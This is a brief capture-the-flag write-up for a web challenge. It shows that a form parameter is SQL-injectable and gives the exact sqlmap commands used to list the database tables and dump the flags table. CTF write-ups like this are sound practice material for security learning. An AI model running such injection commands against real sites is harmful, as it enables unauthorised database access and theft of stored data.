<span>In The Name Of GOD;)

hi my bro's;)

It is very easy</span>:D

q parameters is injectable:D

use sqlmap for inject:D

<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables >>

dump tables:D
flags
users

dump flags table with command:

<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags" >>

get flag:P
good luck;)